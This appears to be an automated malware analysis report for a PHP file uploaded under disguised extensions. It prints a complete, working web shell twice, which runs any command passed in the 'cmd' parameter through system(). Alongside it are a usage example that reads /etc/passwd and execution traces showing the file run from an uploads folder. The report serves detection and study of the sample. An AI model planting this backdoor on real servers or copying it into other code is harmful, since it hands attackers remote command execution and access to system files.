PHP Malware Analysis
4z4.PhP, 4z4.pHp3, 4z4.pHp4
md5: f091d1b9274c881f8e41b2f96e6b9936
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- system (Deobfuscated, Original)
URLs
- http://michaeldaw.org (Deobfuscated, HTML, Original)
- http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if (isset($_REQUEST['cmd'])) {
echo "<pre>";
$cmd = $_REQUEST['cmd'];
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
Execution traces
data/traces/f091d1b9274c881f8e41b2f96e6b9936_trace-1676247942.4424.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:26:08.340236]
1 0 1 0.000191 393512
1 3 0 0.000249 395008 {main} 1 /var/www/html/uploads/4z4.pHp3 0 0
1 3 1 0.000268 395008
0.000298 314224
TRACE END [2023-02-12 22:26:08.340380]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:56:36.905229]
1 0 1 0.000145 393512
1 3 0 0.000199 395008 {main} 1 /var/www/html/uploads/4z4.pHp4 0 0
1 3 1 0.000217 395008
0.000244 314224
TRACE END [2023-02-12 22:56:36.905361]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:03:31.721611]
1 0 1 0.000219 393512
1 3 0 0.000288 395008 {main} 1 /var/www/html/uploads/4z4.PhP 0 0
1 3 1 0.000309 395008
0.000345 314224
TRACE END [2023-02-13 00:03:31.721781]
Generated HTML code
<html><head></head><body>Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
</body></html>Original PHP code
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->